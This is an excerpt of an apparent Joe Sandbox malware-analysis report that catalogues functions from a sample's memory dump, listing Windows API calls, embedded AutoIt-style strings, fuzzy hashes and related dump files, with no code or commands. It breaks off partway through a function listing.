Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 8931fa62e0aaf073972fc57f42275efbf6f2a89ef20dcff90e6a8f1a69331590
Instruction ID: 0f597156c76f37109597413944060b4e8df92a52c7c24f996ed0d5b8dca839e3
Opcode Fuzzy Hash: 8931fa62e0aaf073972fc57f42275efbf6f2a89ef20dcff90e6a8f1a69331590
Instruction Fuzzy Hash: 43C166716183059FD700DF68C88492BB7E9FF89744F10891DF98A9B250D731EE15CB62

Function 00267A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00267AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00267B8F
SHGetDesktopFolder.SHELL32(?), ref: 00267BA3
CoCreateInstance.OLE32(0028FD08,00000000,00000001,002B6E6C,?), ref: 00267BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00267C74
CoTaskMemFree.OLE32(?,?), ref: 00267CCC
SHBrowseForFolderW.SHELL32(?), ref: 00267D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00267D7A
CoTaskMemFree.OLE32(00000000), ref: 00267D81
CoTaskMemFree.OLE32(00000000), ref: 00267DD6
CoUninitialize.OLE32 ref: 00267DDC

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 3da6e5226930fc8d3cb4d011580fc834df8774584ea74adea6afcfa6f1824ae1
Instruction ID: 79141f6d4dc8d779f46fe6e347bf188e7f0a4c31f0fd95908b26d05a0a1ede62
Opcode Fuzzy Hash: 3da6e5226930fc8d3cb4d011580fc834df8774584ea74adea6afcfa6f1824ae1
Instruction Fuzzy Hash: 02C12B75A14109AFCB14DFA4D888DAEBBF9FF48308B148499E919DB361D730ED85CB90

Function 0028541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00285504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00285515
CharNextW.USER32(00000158), ref: 00285544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00285585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0028559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002855AC

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 2446ef9899b786a070932afeb3de73d0a4f5435c5f38f5464a084adce0f725bb
Instruction ID: fa5dff1fbe0e2a3bd372f39fb2619e71875f3e51569e083253c3c4d86bab299a
Opcode Fuzzy Hash: 2446ef9899b786a070932afeb3de73d0a4f5435c5f38f5464a084adce0f725bb
Instruction Fuzzy Hash: F661A038922629EBDF10AF50CC84DFE7BB9FF05321F108155F525A62D0D7749AA0DBA0

Function 0024FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0024FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0024FB08
VariantInit.OLEAUT32(?), ref: 0024FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0024FB3A
VariantCopy.OLEAUT32(?,?), ref: 0024FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0024FBA1
VariantClear.OLEAUT32(?), ref: 0024FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0024FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0024FBCC
VariantClear.OLEAUT32(?), ref: 0024FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0024FBE9

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: bd4645547f924909865a497e63f388e3d8c5c98da8b4e69d432706068c4ce1b8
Instruction ID: 9db0d82da547f247759dfe41a7687dc1962e09f596f459c5cf7b6b21802d3ed3
Opcode Fuzzy Hash: bd4645547f924909865a497e63f388e3d8c5c98da8b4e69d432706068c4ce1b8
Instruction Fuzzy Hash: 32416F35A10219DFCB04DF68DD58DAEBBB9FF48344F108069E946A7261DB30A995CFA0

Function 00259C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00259CA1
GetAsyncKeyState.USER32(000000A0), ref: 00259D22
GetKeyState.USER32(000000A0), ref: 00259D3D
GetAsyncKeyState.USER32(000000A1), ref: 00259D57
GetKeyState.USER32(000000A1), ref: 00259D6C
GetAsyncKeyState.USER32(00000011), ref: 00259D84
GetKeyState.USER32(00000011), ref: 00259D96
GetAsyncKeyState.USER32(00000012), ref: 00259DAE
GetKeyState.USER32(00000012), ref: 00259DC0
GetAsyncKeyState.USER32(0000005B), ref: 00259DD8
GetKeyState.USER32(0000005B), ref: 00259DEA

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: a873db01aa12776954b96d2e4480b0ce9711c2a3b3d337d70a4c54bc30142b15
Instruction ID: 9a0ceb1f1e50ef75dd9a935112469599d90045beb62f78736f8dd34fd1c970b5
Opcode Fuzzy Hash: a873db01aa12776954b96d2e4480b0ce9711c2a3b3d337d70a4c54bc30142b15
Instruction Fuzzy Hash: 4E4128345257CBA9FF319F6088043B5BEB0AF15306F04805ACEC2165C2E7B599ECC7AA

Function 0027055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 002705BC
inet_addr.WSOCK32(?), ref: 0027061C
gethostbyname.WSOCK32(?), ref: 00270628
IcmpCreateFile.IPHLPAPI ref: 00270636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002706C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002706E5
IcmpCloseHandle.IPHLPAPI(?), ref: 002707B9
WSACleanup.WSOCK32 ref: 002707BF

Strings

Ping, xrefs: 00270676

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: f1e38d6047d5bf54c5ee249cdeb83dad8104d97992f8467d2c20eacc2b5bb7c8
Instruction ID: f17cf3b701136b83e553343c3887edabba88b5264158bb68c720e8ef435a2bec
Opcode Fuzzy Hash: f1e38d6047d5bf54c5ee249cdeb83dad8104d97992f8467d2c20eacc2b5bb7c8
Instruction Fuzzy Hash: 0C919B35614202DFD324CF15D4C8F2ABBE4AF48318F14C5A9E4698BAA2C770EC59CF91

Function 00278CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00278CF3

Part of subcall function 00258E54: _wcslen.LIBCMT ref: 00258E77

_wcslen.LIBCMT ref: 00278D4E
_wcslen.LIBCMT ref: 00278D9C
_wcslen.LIBCMT ref: 00278DDC
_wcslen.LIBCMT ref: 00278E6E

Strings

cdecl, xrefs: 00278D48, 00278D4D
none, xrefs: 00278E65, 00278E6A
winapi, xrefs: 00278D96, 00278D9B
stdcall, xrefs: 00278DD6, 00278DDB

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: cf87d83af31b5b2307be44aa9d94baedc0518b03e55f93a7a1f74223e400fbac
Instruction ID: 279b3afa72047805d9bfa0185339afad0c498bab18aa7ef3967c5627533c7da3
Opcode Fuzzy Hash: cf87d83af31b5b2307be44aa9d94baedc0518b03e55f93a7a1f74223e400fbac
Instruction Fuzzy Hash: 8A51C231A601179BCF24DF68C8449BEB7A5BF64760B208229F52AE72C4EB30DD60C790

Function 0027372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00273774
CoUninitialize.OLE32 ref: 0027377F
CoCreateInstance.OLE32(?,00000000,00000017,0028FB78,?), ref: 002737D9
IIDFromString.OLE32(?,?), ref: 0027384C
VariantInit.OLEAUT32(?), ref: 002738E4
VariantClear.OLEAUT32(?), ref: 00273936

Strings

Failed to create object, xrefs: 002737E4, 0027389A
NULL Pointer assignment, xrefs: 0027381E
Invalid parameter, xrefs: 00273865

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 59cd9287cd71b5d4d41338a6a5b060bb077b2d9456c9727a2d9de8bd75054c2f
Instruction ID: 60e0fe1f39b6ba6958ead047c6b8d747a7810ba69182fb03c9436e75dbe2776c
Opcode Fuzzy Hash: 59cd9287cd71b5d4d41338a6a5b060bb077b2d9456c9727a2d9de8bd75054c2f
Instruction Fuzzy Hash: B461B170628302AFD311DF54D889F6AB7E8EF49710F108819F9899B291C770EE58DB92

Function 00288B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00209BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00209BB2

Part of subcall function 0020912D: GetCursorPos.USER32(?), ref: 00209141
Part of subcall function 0020912D: ScreenToClient.USER32(00000000,?), ref: 0020915E
Part of subcall function 0020912D: GetAsyncKeyState.USER32(00000001), ref: 00209183
Part of subcall function 0020912D: GetAsyncKeyState.USER32(00000002), ref: 0020919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00288B6B
ImageList_EndDrag.COMCTL32 ref: 00288B71
ReleaseCapture.USER32 ref: 00288B77
SetWindowTextW.USER32(?,00000000), ref: 00288C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00288C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00288CFF

Strings

@GUI_DRAGFILE, xrefs: 00288C9A
@GUI_DROPID, xrefs: 00288C51
p#,, xrefs: 00288C71

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$p#,
API String ID: 1924731296-1314865358
Opcode ID: 952cec892aa749465f188bc865d7c2c0c86571bd49c1f9719e57f26c661d3928
Instruction ID: 74462a0043d6be1ae88e43f30732b4c809ecf0f2a3c1390dde159699021451a5
Opcode Fuzzy Hash: 952cec892aa749465f188bc865d7c2c0c86571bd49c1f9719e57f26c661d3928
Instruction Fuzzy Hash: D551DD74115304AFD704EF24EC5AFAA77E4FB88710F50062DF956A72E2CB70A924CB62

Function 00263388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002633CF

Part of subcall function 001F9CB3: _wcslen.LIBCMT ref: 001F9CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 002633F0

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00263504
Line %d (File "%s"):, xrefs: 00263443, 0026345C
^ ERROR , xrefs: 0026349E
Incorrect parameters to object property !, xrefs: 002634AB
Error: , xrefs: 002634D1
"%s" (%d) : ==> %s:, xrefs: 00263522

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: cf6f9842c1d11c254ab0a0f4e54cc25033b8a5a607714cc7db944732140322b4
Instruction ID: 44868847b355e355654bb83570e86769f605a03277dd0a3bd26fd75f9630e765
Opcode Fuzzy Hash: cf6f9842c1d11c254ab0a0f4e54cc25033b8a5a607714cc7db944732140322b4
Instruction Fuzzy Hash: 88518D7191020EAADF15EBA0DD46EFEB778AF19384F244065F50572092EB352FA8DF60

Function 0025B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0025B5FC
_wcslen.LIBCMT ref: 0025B608
_wcslen.LIBCMT ref: 0025B64D
_wcslen.LIBCMT ref: 0025B68C
_wcslen.LIBCMT ref: 0025B6C7

Strings

REMOVE, xrefs: 0025B602, 0025B607
APPEND, xrefs: 0025B6C1, 0025B6C6
EXISTS, xrefs: 0025B686, 0025B68B
KEYS, xrefs: 0025B647, 0025B64C

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: f89ad3f3154cf1453eabe907325c8a2e6854111eb50f3e63ae48174409a10564
Instruction ID: 77eb04cb535ed44453832abad2b4e3bf25c66b4593263b624b1e4f2c04a5f1e2
Opcode Fuzzy Hash: f89ad3f3154cf1453eabe907325c8a2e6854111eb50f3e63ae48174409a10564
Instruction Fuzzy Hash: 12410B32A200279BCB116F7DC8905BEB7A9FF60795B244129EC25D7284F735CDA5C790

Function 00265393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002653A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00265416
GetLastError.KERNEL32 ref: 00265420
SetErrorMode.KERNEL32(00000000,READY), ref: 002654A7

Strings

UNKNOWN, xrefs: 00265444
INVALID, xrefs: 00265459
READONLY, xrefs: 00265452
READY, xrefs: 00265460, 00265468
NOTREADY, xrefs: 0026544B

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 9f7491e5ead042b65a9450229bc14c34b04c14785cd9f438ba66a1eac77bd311
Instruction ID: 005694318889fb3069d8bebf59864f609c599ab35429e3566e6b66f4ebcdb02e
Opcode Fuzzy Hash: 9f7491e5ead042b65a9450229bc14c34b04c14785cd9f438ba66a1eac77bd311
Instruction Fuzzy Hash: 5431C375A1051A9FC710DF68C488BAABBF4FF45305F1480A5E505CB292DB71DDD6CBA0

Function 00283C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00283C79
SetMenu.USER32(?,00000000), ref: 00283C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00283D10
IsMenu.USER32(?), ref: 00283D24
CreatePopupMenu.USER32 ref: 00283D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00283D5B
DrawMenuBar.USER32 ref: 00283D63

Strings

F, xrefs: 00283D4E
0, xrefs: 00283C54

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 3276e8d3cc2b7b5ad8f01f99c85c0d8f4529ef462181f82313f86ca8d04a6033
Instruction ID: d8e5a1fe5f389ec2f7ee891acc95ce7c416df4ad1092b5cc0138b011d4317c41
Opcode Fuzzy Hash: 3276e8d3cc2b7b5ad8f01f99c85c0d8f4529ef462181f82313f86ca8d04a6033
Instruction Fuzzy Hash: 07418E7961220AEFDF14DF54E848E9A77B5FF49300F144029F906A73A0D730AA20CF50

Function 00283A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00283A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00283AA0
GetWindowLongW.USER32(?,000000F0), ref: 00283AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00283AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00283B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00283BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00283BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00283BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00283BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00283C13

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 23711895240e162d3f2644601019f85bc96bb86aaa68fb27bbb330d67b30db77
Instruction ID: 628b4c7c3512a4ba6150b804e13041166c911d47e953a91b56578eea378ce5b9
Opcode Fuzzy Hash: 23711895240e162d3f2644601019f85bc96bb86aaa68fb27bbb330d67b30db77
Instruction Fuzzy Hash: 3F618C75911248AFDB10DF64CC81EEE77B8EB09704F10019AFA15A72D2D774AA61DB50

Function 0025B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0025B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0025A1E1,?,00000001), ref: 0025B165
GetWindowThreadProcessId.USER32(00000000), ref: 0025B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0025A1E1,?,00000001), ref: 0025B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0025B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0025A1E1,?,00000001), ref: 0025B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0025A1E1,?,00000001), ref: 0025B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0025A1E1,?,00000001), ref: 0025B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0025A1E1,?,00000001), ref: 0025B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0025A1E1,?,00000001), ref: 0025B21D

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 125158795b3afa6dfa36bd452b9b9a1f044fe4db9398c43c1a0f4ef2d9afa0df
Instruction ID: 5ebe05b62fe7f9e467932ee80b4e40cb1f5219e29440688f114576f74372d8f6
Opcode Fuzzy Hash: 125158795b3afa6dfa36bd452b9b9a1f044fe4db9398c43c1a0f4ef2d9afa0df
Instruction Fuzzy Hash: 6731897A520605AFDB12DF24FC4CFAD7BA9BB51312F208425FE05D6190D7B49A448FB8

Function 00222C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00222C94

Part of subcall function 002229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0022D7D1,00000000,00000000,00000000,00000000,?,0022D7F8,00000000,00000007,00000000,?,0022DBF5,00000000), ref: 002229DE
Part of subcall function 002229C8: GetLastError.KERNEL32(00000000,?,0022D7D1,00000000,00000000,00000000,00000000,?,0022D7F8,00000000,00000007,00000000,?,0022DBF5,00000000,00000000), ref: 002229F0

